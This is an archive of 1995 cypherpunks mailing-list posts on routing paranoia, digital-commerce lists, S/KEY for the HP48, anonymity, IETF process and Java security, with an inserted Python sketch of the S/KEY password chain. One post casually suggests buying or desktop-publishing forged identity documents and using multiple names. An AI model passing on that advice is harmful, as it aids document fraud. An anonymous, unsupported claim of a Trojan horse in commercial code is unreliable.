 6   (134.222.9.1)  80 ms  312 ms  84 ms
 7  lp (134.222.35.2)  270 ms  400 ms  216 ms
 8  Vienna2.VA.ALTER.NET (137.39.11.2)  660 ms  1509 ms  886 ms
 9  dataserv-gw.ALTER.NET (137.39.155.38)  1829 ms  1094 ms  1306 ms
10  orion.datasrv.co.il (192.114.20.22)  1756 ms  1280 ms  1309 ms
11  ...


Notice that both messages went through an unnamed site -- 134.222.9.1 and
then a strangely-named site, "lp (134.222.35.2)" -- then through the same
Vienna, Virginia (USA) site ... and thereafter, on to their destination.
I.e., the second message went through Virginia to get from Switzerland to
Israel.

The whois servers at the InterNIC and at nic.ddn.mil for MILNET Information
report, ``No match for "134.222.9.1". '' and `` No match for
"134.222.35.2".''

Now let me see ... which spy agencies are located in or near Virginia?

--jim


&&&&&&&&&&&&&&&&&&&&

***********end_included_text*************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 6 Nov 1995 06:39:12 +0800
To: www-buyinfo@allegra.att.com
Subject: e$: The Movie
Message-ID: <v02120d01acc2e740f9f0@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


                               Announcing
                             e$: The Movie


11/6/95

Almost a year ago, I noticed that traffic was tapering off on one of
the digital commerce e-mail lists I'm subscribed to, www-buyinfo, which
is run by Dave Kristol at ATT. So, every once in a while, I started
zinging relevant crossposts over there from cypherpunks, a famous
crypto list with about 20-25% e$ content.

I started getting actual fan mail for this, so I kept doing it. Now, it
seems that, say, 85% of all of the traffic on www-buyinfo is my
cross-posting from cypherpunks. Dave says there are 500-600 people
worldwide who have stayed on www-buyinfo during all this time, so it
seems like I can claim at least some of them as an audience for what
I'm doing, with no promotion of the list at all, except word of mouth.

We've even had several discussions on the list about whether I should
continue doing it, and every time we've done so, the answer has been a
resounding "yes".  However, www-buyinfo does have a charter, and even
though what I'm doing drifts the charter substantially, I'm restricted
in what I can put there.  It's not fair to Dave or the subscribers for
me to turn their list into my private spam channel. Also, Dave
has said repeatedly that he's interested in re-tooling www-buyinfo
into something more technical, so, at some point, the party's going
to be over, and we'll have to pack up our tents and move on.

Meanwhile, I've also taken to writing on the net, and more recently,
speaking to professional groups, on the topic of e$, and I have gotten
very good response to that as well. An edited version of one of my
longer net.rants is in this week's InfoWorld, for instance. That one
got me fan mail from all sorts of people (like Guy Kawasaki, Stewart
Alsop, and Adam Engst, for instance) when the original version appeared
first in the apple-internet-users list a while back.

I've managed to have a lot of fun with this stuff. One of my
suggestions on cypherpunks started ecm, the secondary market for
Digicash's beta-test digital cash certificates. I had so much fun
talking about digital commerce with Peter Cassidy, a freelance writer
for Forbes ASAP, Wired, and the Economist, that the two of us started
the Boston Society for Digital Commerce, a luncheon group that meets
once a month to talk about this stuff. BSDC has about 40 members now,
and our second meeting is on Tuesday.


So, I've decided I'd jump into this with both feet.  A friend of mine at
Apple Computer, Vinnie Moscaritolo, has volunteered his time to put up
a web site about e$. It's pretty much live, though still under
construction, at its temporary home of

http://www.webstuff.apple.com/~vinnie/rah/ .

Vinnie is now in the process of hooking up a small stand-alone machine,
to live somewhere else on the net besides in Apple's domain, which will
house this web-site along with three mailing lists, all of which will
be archived and eventually web-searchable. Over the next few weeks,
we'll be starting up these lists and announcing them here. They are:

* _e$_: A discussion list on digital commerce and financial cryptography
and their consequences.  This list will be for people who have a strong
understanding of markets of all kinds, who understand the consequences
of strong cryptography and digital certificate technology on public
networks, and who want to make money in this environment. We welcome
Entrepreneurs, Analysts, Cryptographers (Amateur and Otherwise), Free
Marketeers, small-"l" libertarians, and, even (horrors!) a
crypto-anarchist or two.

* _e$pam_:  My personal spam-channel to the universe. ;-). Pretty much
what I do now with www-buyinfo from cypherpunks, only with all the
net.sources I can find. It will have the same content touchstone as e$
will, but it will consist entirely of filtered information from
secondary sources. In other words, it won't say "e$spam" until I say it
says "e$spam".  At some point, e$spam will have filter-fodder in it --
or some other method will be set up -- so that people who are already
subscribed to one of the lists I'm filtering won't have to see things
twice. We're still working on that.

* _Ne$ws_, a newsletter with original content from myself and various
other authors, in the same vein as Adam Engst's TidBITS, but focused on
the subject of e$.


I figure that there are enough different ways to pay for both my time
and the resources necessary to make this work that it's now worth
spending a little of my own time and resources in order to get all this
started. Certainly the market for information and commentary on e$
isn't getting any smaller.

I'm looking at a sort of "creep, crawl, walk, run" scenario for funding
all of this. The first stage will be to solicit sponsorships, both
in-kind and in plain old money. The second will probably be to
determine whether subscriptions to any or all of the e$ lists or
archives would ever make sense. Finally, with the advent of real
digital cash on the net, and with First Virtual proving e$ trades can
be done by anyone, it may be possible to do some kind of e$
micropayment-as-you-go system for things like subscriptions,
web-archive access, and the like, so I'm looking at that also.

Obviously, I don't want to price myself out of the market with all of
this, because, like anything else on the net, anyone can come along and
do exactly the same thing for less money, and then I'm out of business.
I do think, however, that what I propose to do is worth money to the
people who want it, and so I'm going to figure out how to get paid to
do it.


Well, that's about it.  Watch this space for details, and wish me luck!


Cheers,

Bob Hettinga,
impre$ario-to-be






-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJ04K/gyLN8bw6ZVAQG+2QQAowzLfmH5paNaZgrAdlEeSH9YcKysW07A
B7QxbQhP9WIat2rMIA4HoIioQr+Xo5RZ3oOO+btSksHNnV1P3Q2Ca49BJxdMsQd7
GhdGoUv2/C150mH13crc3cZuOCChfisjYHM8So2XsuVjKex4ETZecDLfSn+b4yzl
mtfJvZQ3e1o=
=2vLb
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Mon, 6 Nov 1995 00:33:44 +0800
To: cypherpunks@toad.com
Subject: S/KEY available for HP48 handheld calc
Message-ID: <9511051627.AA15400@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Steve VanDevender (<stevev@greylady.uoregon.edu>) made available (GNU
GPL) an S/KEY implementation for the nice HP hand held calc.
It works very nicely with both MD4 and MD5 based systems (I personally
tested with my MD4 based logdaemon-4.9; the author recommends OPIE's
one)

I've put his stuff on my anonymous ftp, you can fetch the stuff
starting on 
  ftp://ftp.box.eu.org/hp48/skey/
(ftp.box.eu.org=hplyot.obspm.fr=145.238.44.5)
the executable I got from usenet has the following MD5 digest:
1b2613383708d4825f5842ed3e630d40  skey

I hear you can get an hp48 for $30 in the US (I paid US$230 for my hp48g
when it came out in France two years ago),
so no more excuse for clear passwords over the net! [nor to sell 'smart
cards' for mega bucks!]

ps: Who writes PGP for hp48 now ;-) ?
[or maybe more seriously some skey hooks to it ?]

dl
- --
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Panama South Africa DST domestic disruption counter-intelligence
 cracking Legion of Doom

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAgUBMJzlz3k52/beodHxAQEAGQP/XcX3mOw8YIVKe3kEuUkRb6wjB7JAvTi3
t/aQNAT/LQR4ZCx954HbqS231P3qxuz2Hc88xs7HAfbzk91C6VQ9J/r1+C7yBMiR
Jlk19lnWny8yHlkwm8KzF1TvqnZ6LvnGgLoiq5ExJIGJpRyJUf912LZf8N06tyFG
IJs8ZcN8/Kk=
=6RT6
-----END PGP SIGNATURE-----
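
Added example, not part of the message above and not the HP48 program's code: a sketch of the one-time-password hash chain that S/KEY-style systems use, in the MD5 variant with the 64-bit fold described in RFC 2289, with both the client and server side. The pass phrase, seed and sequence number are constructed values, and the `Server` class is a hypothetical stand-in for a login daemon.

```python
import hashlib
import hmac


def fold_md5(data: bytes) -> bytes:
    """MD5, folded to 64 bits by XORing the two halves of the digest."""
    d = hashlib.md5(data).digest()
    return bytes(x ^ y for x, y in zip(d[:8], d[8:]))


def otp(passphrase: str, seed: str, count: int) -> bytes:
    """One-time password number `count`: the initial fold hashed `count` more times.

    The seed is lower-cased and placed before the pass phrase.
    """
    value = fold_md5(seed.lower().encode() + passphrase.encode())
    for _ in range(count):
        value = fold_md5(value)
    return value


class Server:
    """Hypothetical server side: stores only the last accepted OTP, never the secret."""

    def __init__(self, seed: str, count: int, last: bytes):
        self.seed = seed
        self.count = count      # sequence number of the stored OTP
        self.last = last        # otp(passphrase, seed, count)

    def challenge(self):
        """Ask the client for the OTP one step earlier in the chain."""
        return self.count - 1, self.seed

    def verify(self, response: bytes) -> bool:
        if self.count <= 0:
            return False        # chain used up; the user must re-initialise
        # Hashing the response once must give the stored value.
        if not hmac.compare_digest(fold_md5(response), self.last):
            return False
        self.last = response    # the accepted OTP becomes the new reference
        self.count -= 1
        return True


def demo():
    secret = "constructed pass phrase"   # lives only in the user's calculator
    seed = "hp48demo"                    # constructed seed
    server = Server(seed, 100, otp(secret, seed, 100))

    n1, s1 = server.challenge()
    sent = otp(secret, s1, n1)           # this value crosses the network
    first = server.verify(sent)

    replay = server.verify(sent)         # an eavesdropper resends what it saw

    n2, s2 = server.challenge()
    second = server.verify(otp(secret, s2, n2))
    return first, replay, second, n1, n2


if __name__ == "__main__":
    print(demo())
```

A captured response is useless for the next login because the server now expects the value one step earlier in the chain, which cannot be derived from the captured one without inverting the hash.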




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 6 Nov 1995 13:06:07 +0800
To: Stephen Whitaker <whitaker@sover.net>
Subject: Re: nym-compoop
In-Reply-To: <199511060335.WAA04917@maple.sover.net>
Message-ID: <Pine.SOL.3.91.951105204109.7550C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 5 Nov 1995, Stephen Whitaker wrote:

> Back to where this started:
> Eating my tasty crow gives rise to another question relating to the timing
> and continuity of these threads: How did the first responder on the RE:
> 134.222.9.1, Simon Spero, reply at 10:48 pm on Nov. 4 to Anonymous' posting
> of 7:19AM on Nov 5? Which way is this thing spinnin?

Multiple choice:

a) Because I have a PPP connection to Dionne's Psychic Internetwork
b) Because my brownian motion RNG used an inferior quality rubber band 
   and I can now travel through time.
c) Because the Earth is round.

Let's work the example:

a) can't be correct, because there's no way anyone on my salary could
   afford the 1-900- charges.

b) can't be correct because if I could travel in time this weekend, I'd have
   gone to Ramat Gan with an Uzi, and one of the best generals of the
   twentieth century would still be alive.

c) could be... I wrote the message from a machine in Menlo Park, which is
   in the Pacific time zone. Convert both times to GMT, and everything makes
   sense.

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 7 Nov 1995 01:27:27 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: using PGP only for digital signatures
Message-ID: <199511060208.VAA14123@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>> Consider this: most people in the U.S. do not have a "credential" that
>> shows them to be U.S. citizens. (Hint: most people in the U.S. do not have
>> passports.)

My passport is always close at hand.  I love an unchallengeable credential
that has neither my address nor my SS# on it.  I also carry my birth
certificate which I use for most non-driving interactions.  It doesn't have
much useful info on it.  Secured credit cards which can be obtained in any
name are also handy.  

>A green card, by itself, also fails to prove legal status.

Don't "green cards" have pictures now?  If they do, they should be usable to
prove both status and identity.  I'm talking about the new "renewable" ones.

>Proving legal residency requires a combination of two documents, one each
>from specified lists. Most commonly a driver's license, green card (which
>is actually pink), or birth certificate from list A, and a social
>security card from list B. 

You need proof of citizenship or residency and proof of identity.  Passport
and naturalization papers work for both.  Otherwise you have to pay the $25
to the guy on the corner for a birth certificate and driver's license.  Or
DTP it yourself since employers aren't very good at checking papers.  Or
dodge the whole thing and work for yourself.

DCF

"Who am us, anyway?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 6 Nov 1995 10:23:00 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: "The Policeman Inside"
Message-ID: <199511060208.VAA14131@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:54 AM 11/5/95 -0800, you wrote:

>My point, originally, to Rich Graves' mention of Chris Hibbert's excellent
>FAQ on Social Security Numbers and person numbers, is that it is no longer
>relevant to fight against a "single index number." Modern data base methods
>are so well-suited to cross-indexing that it hardly matters whether there's
>a single point of entry to the data base or not.

However, modern life is also well-adapted to the counter strategy of
fuzzying up any focus on your "cluster of transactions."  Thus it is trivial
to use multiple names and addresses for multiple transactions.  Particularly
if you "go bare" in the insurance arena, many tracking opportunities are
denied your opponents.  This will also save you big bucks in premiums
foregone.  You also have to watch the stuff most people don't think about
like magazine subscriptions which can easily be had in any name (and should be).

The current possibility of getting multiple secured credit cards in multiple
names will become even more fun as the temporary Visa and Mastercards
(traveler's checks on a card) are issued.  Plenty of entrepreneurs will be
buying and selling those.  Just like the phone card market today.

>THE KEY POINT IS THIS: Are voluntary economic transactions between persons
>to be subject to approval and regulation by the State? 

They will no doubt try but closed systems have a hard time competing with
open systems. A good way to track the future control possibilities is to
track how easy it is to get an internet account.  If it remains as easy to
get an internet account in the future as it does today, then it will be very
hard to indulge in central transaction controls. I am predicting that there
will be a convergence between the ease of communicating over the nets
(institutional ease not interface ease) and the ease of completing
transactions.  I think the convergence will be one sided in the direction of
easier and easier transactions.  Again, I'm not talking about technical ease
here but the structural or institutional ease of completing transactions.
"Frictionless Capitalism" is frictionless across the board.

The belief that it is possible to "press down upon the brow of labor this
Crown of Thorns, to crucify mankind upon a Cross of Red Tape" (to mangle a
phrase) is worthy of ridicule.  I happened to catch "Funeral in Berlin"
today.  The Commies didn't manage it with a lot more going for them than
Slick Willie has.  They got their clocks cleaned by MarketEarth.  The
Securities and Exchange Commission doesn't stand a chance.  

>If babysitting and
>lawnmowing, not to mention hiring someone to write some C code, requires
>submitting tax and Social Security forms, requires checking the J-1 vs.
>Permanent Resident vs. Approved Citizen Unit status, then the die is cast.

I thought the guy was in Zamboanga (where the monkeys have no tails).  At
least that's what he told me in his email.  The gardener was an independent
contractor.  The babysitter worked for a temp agency (at least that's what
she said).  I know I paid a company.  At least the digicash went to
something with a company name.

>Well, the State is becoming more efficient in tracking such things, and tax
>penalties are increasing.

Not sure if that's true.  Are there fewer illegal aliens, fewer people
driving without licenses, fewer people practicing medicine without a
license, etc than in 1960, 1970, 1980?  I seriously doubt it.

>In closing, we must beware "the policeman inside," to use the William
>Burroughs term. A surveillance state that arises because modern computers
>and data bases allow all economic transactions to be monitored, taxed, and
>approved or disapproved is a horror we should fight with all of our
>resources. Whether right-, left-, or libertarian-leaning, the implications
>of this state power to control our lives are horrible.

No argument there.

DCF

"Freedom isn't Freeh 
freedom isn't Freeh
you've got to pay the price 
you've got to sacrifice
for your liberty" -- Here's hoping you're all morally rearmed.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 6 Nov 1995 10:22:49 +0800
To: John Young <jya@pipeline.com>
Subject: Re: 800_ape
Message-ID: <199511060208.VAA14144@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:23 AM 11/4/95 -0500, you wrote:
>   11-5-95. NYPaper Sunday Magazine:
>
>   "Making Microsoft Safe For Capitalism. How do you restrain
>   an 800-pound gorilla?" Cover story. By James Gleick.

>     It's time to draw the line. But where?
>
>      'Anything not a direct lie or clearly illegal is O.K. to
>      do if it advances Microsoft's tribal cause,' Mitchell
>      Kapor says. 'This licenses the worst sort of
>      manipulations, lies, tortured self-justification and so
>      on.'

So Gleick wants to unleash the Justice Department to protect his ISP from
Microsoft's competition.  Can't cut it without Big Brother's help, eh?  

All I've got to say about this piece of commie trash is GM, ATT, IBM, USSR,
CIA, & KGB.

It took me all of 10 seconds to figure out how to delete the icons for the
MSN and MS' Internet Browser from my WIN95 desktop.  The help message that
popped up when I did this also told me how I could delete the actual
programs from my hard drive.  (Hint, James: try clicking the *right* mouse
button.)

DCF

"Worrying about a large institution especially when it has computers is like
worrying about a large gorilla especially when it's on fire." Bruce Sterling.
CFP95. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Mon, 6 Nov 1995 06:33:31 +0800
To: cypherpunks@toad.com
Subject: Re: Credentials Without Identity
In-Reply-To: <acc1ae3828021004292e@[205.199.118.202]>
Message-ID: <47jcob$cf7@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.HPP.3.91.951105123707.4854A-100000@cor.sos.sll.se>,
Mats Bergstrom <asgaard@sos.sll.se> wrote:
> This applies very much so in Sweden too. It *is* illegal to maintain any
> database with 'information on persons' (like their email addresses) without
> approval from the Data Inspection. But it's an open secret that this law
> is broken on a massive front and no bureaucrat is really trying to uphold it.

This is the worst possible situation, because it equates to a licence
to harass for the police.  If you obey the law, then you are at a
disadvantage compared to people who are not bound by it because they
are ignoring it, and who can because they are doing government-friendly
things; but if you break the law, then you can be prosecuted.
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 6 Nov 1995 15:12:03 +0800
To: cypherpunks@toad.com
Subject: Re: Keyed-MD5, and HTTP-NG
Message-ID: <199511060639.WAA20500@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 1 Nov 1995 hallam@w3.org wrote:

> > There were two names on the MD5 document -- mine and Bill
> > Simpson's. Bill didn't tell me that he was called (I suspect he 
> > would have), and I wasn't called, either. We were the only two 
> > editors of that portion of the specification.
> 
> This appears to have been a problem from both ends. A number of
> people around here only heard about the IPsec work when it had
> reached the final call phase.

Hmmm, I guess (as usual) people weren't keeping up with the drafts.  It 
really makes some of us outsiders wonder what the IETF actually does in 
its gilded white towers.

> I think this highlights one of the problems with the IETF: we need a
> much broader infrastructure for understanding what progress other
> groups have made. The time when we can expect to do everything through
> email alone is past. I wish I could persuade more people in the IETF
> that the Web infrastructure could provide a valuable assistance
> as a collaboration tool for their needs. Unfortunately the approach seems
> to be that because there is a person living at the end of a 2400
> baud modem in Vermont who cannot configure his PPP we should all continue
> in the stone age.

I guess that's certainly an _elitist_ attitude.  Let's leave Vermont alone
for a second and maybe talk about including the developing world in the
process.  That might explain some of the resistance. 

In many parts of the world, the basic telecommunications infrastructure
simply won't support a 2400 baud connection.  Does this then mean that
there should be no advocate, no voice for citizens from those regions
because they are limited to 300 baud? 

Hopefully we all agree that developing nations are equally entitled to a
voice in establishing standards which will define the foundations of the
next century.  I can't imagine anyone arguing for a pre-emptive silencing
of voices which strive to be heard through setting technical standards as
a floor -- minimum standards which are designed *purposefully* to exclude.

Next thing someone will advocate is EBCDIC, or some equally lame
idea, I guess ...

> We could improve readability of RFCs through using HTML and reduce
> the flamage on mailing lists through collaboration tools like the
> open meeting. But we don't because it hasn't been done that way in the
> past.

Well, I think that it is possible to read a mailing list through HTML if
that is what you would like to do.  You have that option and choice. But
this does not mean that you should dictate that everyone should follow
your choices and preferences. 

While some would argue, that the attempted imposition of your personal
preferences is demonstrative of a monstrous ego that does not recognize
inherent individual jurisdiction, I won't expose myself to the accusation
that I would advance such a specious argument, I will simply ask what you
would suggest is the solution to including alternate views and voices, if 
it isn't a mailing list.

Will the standards track follow a policy of inclusion or historic policies
of exclusion? 

> I would like to see a collaboration system where I can present an expert
> with the context of a proposal very rapidly without expecting them to
> read the archives of an entire mailing list.

It really doesn't take all that long to get up to speed.  A couple of
months, tops.

> 	Phill
> 


Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 6 Nov 1995 08:58:06 +0800
To: cypherpunks@toad.com
Subject: whose watchin Cypherpunks: nym question
Message-ID: <199511060047.BAA06872@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


      Stephen Whitaker-nym's resubmission ("whose watchin the watchers"
4:19 PM 11/5/95) of the very same material that I had posted last night
suggests some questions about some aspects of nym theory. I hope the
following isn't too naive, and I apologize if it is.
      When I saw issue 183 of GovAccess, Jim Warren-nym's remarks seemed
suspect, but I didn't have a thorough enough understanding of the issues
to judge them myself -- so I decided to vet the question with the
Cypherpunks. I'm glad I did: the quick and knowledgeable responses
clarified the error, and I forwarded them to Warren-nym so that he could
correct himself promptly. The end result, as Warren rightly suggests I
think, is that a better understanding of the issues has been propagated to
his subscriber base.
      AFAIK, Warren-nym has an excellent reputation -- and that fact
certainly encouraged me to provide him with the info he would need to
correct himself quickly. OTOH, my actions garner no reputation for me --
neither for my True Name nor for nobody@REPLAY.COM. Of course, whether
such actions merit any reputational shift is debatable: I contributed no
knowledge of my own, just merely acted as a go-between. Still, the fact
that GovAccess 184 quotes my response might suggest that I beat others to
the punch; and were I able to act in such a capacity on a regular and
consistent basis, and were I to do so in a field with higher stakes, I
would surely garner a reputation. Granted, this is a lot of "woulda,
coulda" -- but it leads me to conclude that it is not the shortcomings of
my *action* that are the cause of the fact that I garner no reputational
improvement in this instance.
      Stephen Whitaker-nym's resubmission of this material, OTOH, lowers
his reputation in my eyes -- which is strange, because the only real
distinction between what he did and what I did has to do with the fact
that he sent mail to Cypherpunks without reading the Cypherpunks traffic.
So his reputational shift is purely contextual.
      So why don't I, then? Well, for starters, the nym that the Replay
remailer assigned to me is publicly accessible: anyone who uses this
remailer in the way that I did will be assigned the same quasi-nym,
nobody@REPLAY.COM. Yet if, through some statistical improbability, I were
the *only* person *ever* to use this remailer in this way, and I *only*
ever used it to perform actions that would improve the reputation of a
stable nym, then the public knowledge of Replay's functionality would
nevertheless serve to hinder any reputational shift that my actions had
earned: people might say, "Every message I know of that has passed through
Replay has been accurate, timely, and significant" -- but that would
improve the reputation of the Replay remailer rather than of its sole
user, myself, even though it was my actions -- *including* the use of the
Replay remailer -- that brought about this reputational shift.
      So what is a nym if not a "True Name"? I distinguish "True Name" (in
quotes) from True Name: a True Name is tied to a matrix of information
extrinsic to the entity it refers to (a SS# has no *intrinsic* relation to
the entity it designates), whereas a "True Name", though free of this info
matrix, nevertheless operates according to the same logic that a True Name
does -- in terms of being tied to actions that garner reputational shifts.
The point being -- I'm probably being pretty unclear -- that if the major
distinction between a "True Name" and a True Name is links (or the lack
thereof) to arbitrary and external information (and maybe the disposability
that the lack of links implies), then a lot of nym theory seems like it
pretty much reproduces True Name logic and operations. 
      Anyway, a lot of you understand this all better than I do, so I hope
to learn from any responses I receive.

Thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 6 Nov 1995 19:02:52 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto++, Cpunk Icons, list noise
Message-ID: <199511061050.CAA17098@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 Nov 1995 don@cs.byu.edu wrote:

> An anonymous complainer writes:
> 
> >Well, Perry, my opinion is that there is far too much noise on this list 
> >as it is.  I have already seen my words drowned out by bellyaching over 
> >next to nothing.
> 
> POT-KETTLE-BLACK.
> 
> Also, since nothing you've written (in your commentary, as opposed to
> anonymous announcements or releases that most people use anonymity for
> here) indicates that you're using anonymity for any particular reason,

Hmmm, I'm not sure that anyone has an inherent right to question WHY a
person seeks moments of anonymity or privacy.  I don't believe that
anyone should be placed on the defensive, for *choosing* to maintain
some semblance of a personal life, or wishing to maintain some
illusions that they might still have some shred of personal privacy
left.  Hopefully, we can still leave a man with his dignity.

I should not have to defend my right to present my ideas as I believe
are appropriate to the circumstances.  My choice to present the idea,
that an entire economic sector needs to carefully reevaluate their
strategic choices, and their discovered hidden security attitudes -- will 
stand or fall strictly on its merits.  The debate is not advanced in any 
way by attaching a reputation to the question.

Like any other person, I have my skeletons, and I have my regrets.  I 
certainly have unfinished, unresolved, issues that I need to tend to.  In 
that sense, I am no different than any other man.  I also realize that 
ultimately, I'll have to come forward from behind the veil of secrecy 
which is provided to me.  

This I will do, after I have reconciled my own security considerations.

Please allow me the boundary and dignity to choose when, where, and in 
what form I choose to reveal myself.  That inherent right, should be
extended to any man, and no man should be called to account for his 
desire to maintain his personal privacy, no matter how arbitrary his
reasons.

Especially when he comes forward to challenge Goliath.

> please stop so people can killfile you. Or send it from a nym at
> alpha.c2.org. I mean, the NSA has your real name anyway, what's the
> point... 

At this time, I don't feel that a bi-directional private communications
channel is needed.  I have no need for a "nym".  People who need to
contact me, can.  People who would like to know a bit about me, can. 
Netscape has my address.  So does AT&T.  And reputations aren't pertinent. 

(Although, I will say, that the disappearing here-again, gone again,
internet draft at ds.internic.net is simply childish, and I'm certain that
it was just routine "file maintenance" that caused the flicker.)

The ball isn't in my court, it's in theirs.

Netscape and AT&T are some of the primary parties who will have to take
the hit for the fiasco that they find themselves in.  For now, I'll leave
my communication channels with them open, rather than letting my mail
queue fill more than it already has.  Email that is already overqueued. 
 
I don't really envy the two companies' position.  No one expects to find
as significant a security flaw as my anonymous email to this list detailed
at this stage of code Burn-In, and I don't take any pleasure in facing the
unenviable task of informing ANY party that a Trojan Horse has been
engineered into the fabric of an existing globally installed code base. 

No one does.

And as the messenger, I (hope) I don't have anything to fear, from the NSA
or any other foreign group that would seek to pursue its own agenda within
the borders of sovereign Canada.  I really don't think that the NSA is
"evil incarnate", as some list subscribers do.  They have their
intelligence and know how to use it.  Usually, they use it prudently. 

If I did have any worries about the NSA, then I might take some elementary
precautions.  I certainly wouldn't have my terminal screen pointing
towards the twelve odd feet of open glazing that sits behind me, as I
currently do. 

Privacy can't simply be reduced to "a desire to hide from the NSA", just
as security isn't something which is simply provided by licensing from
RSA. 

Look to the message rather than the messenger.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: EWilhem@aol.com
Date: Mon, 6 Nov 1995 16:06:50 +0800
To: cypherpunks@toad.com
Subject: Magic Money
Message-ID: <951106025715_99002994@emout06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Where do I get the software? Please E-mail me at roger12@cam.org. I'd like the
evaluation software.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 6 Nov 1995 18:17:23 +0800
To: whitaker@sover.net (Stephen Whitaker)
Subject: Re: nym-compoop
In-Reply-To: <199511060335.WAA04917@maple.sover.net>
Message-ID: <9511061002.AA10494@all.net>
MIME-Version: 1.0
Content-Type: text


> I'm glad "nobody" thinks I'm a nym for being a good eight hours:fifty-nine
> minutes out of step and having lowered my reputation in his/her eyes. Now
> I'll ask my question again, which apparently got lost in the collective
> groan of my stale post:

You're just fine.

>         Are there ways for someone with access to modify router tables 
>         to constantly create alternate paths at other routers 
>         which would serve to end-around any such snoops?

Yes - and for other purposes as well.

...
> I can hardly find anyone who even cares about the fact that our legislature
> relies on the executive branch gov-net managers for their port/connection on
> the internet router. They also rely on the executive branch for
> troubleshooting their novell LAN. Does anyone else see a separation of
> powers issue or privacy issue here? Note that I cc: the speaker, who cares
> but doesn't yet grasp the implications. Feel free to write him directly. His
> name is Michael Obuchowski, Obe for short, <speaker@leg.state.vt.us>, tell
> him I sent you.

Is this really him, or just a secretary with electronically generated
keyword search and reply capabilities?

...
> Back to where this started:
> Eating my tasty crow gives rise to another question relating to the timing
> and continuity of these threads: How did the first responder on the RE:
> 134.222.9.1, Simon Spero, reply at 10:48 pm on Nov. 4 to Anonymous' posting
> of 7:19AM on Nov 5? Which way is this thing spinnin?

Time zone differences.  I also wish my mailer understood GMT so it would
properly sort events in time order instead of sender time of day order. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 6 Nov 1995 19:02:23 +0800
To: cypherpunks@toad.com
Subject: Java insecurity - long - argumentative - you are warned.
Message-ID: <9511061047.AA13370@all.net>
MIME-Version: 1.0
Content-Type: text


WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS
A FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED!

From the Java Web pages (as combined in Firewalls/BoS):

> The language's security features (not just applets):
> 
> (http://java.sun.com/whitePaper/javawhitepaper_6.html#HEADING15)
> 
> 4.2 Security in the Java Environment
> 
> Security commands a high premium in the growing use of the Internet
> for products and services ranging from electronic distribution of
> software and multimedia content, to "digital cash". The area of
> security with which we're concerned here is how the Java compiler and
> run-time system restrict application programmers from creating
> subversive code.

But not non-subversive code?  Sounds like a value judgement to me.
Subversive code is not otherwise defined in these documents.

> The Java language compiler and run-time system implement several
> layers of defense against potentially incorrect code.

Is incorrect code subversive?  Vice versa? Does Java provide defenses
against my code not properly calculating numbers?

> One of the Java
> compiler's primary lines of defense is its memory allocation and
> reference model. Simply put, Java does not have "pointers" in the
> traditional C and C++ sense--memory cells that contain the addresses
> of other memory cells.
> 
> Memory layout decisions are not made by the compiler, as they are in C
